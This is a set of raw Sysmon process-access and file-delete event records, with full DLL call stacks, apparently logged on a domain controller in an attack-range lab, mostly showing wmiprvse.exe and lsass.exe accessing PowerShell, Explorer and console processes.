 10341000x80000000000000002243413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DFAA-00000000AD01}11172C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9760CCC62CAA6E97C2E884E2455B56B8,SHA256=1247D0D46663A1B54CECE31BCDAF22F58CA001ED13DB32712839889DA59434D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 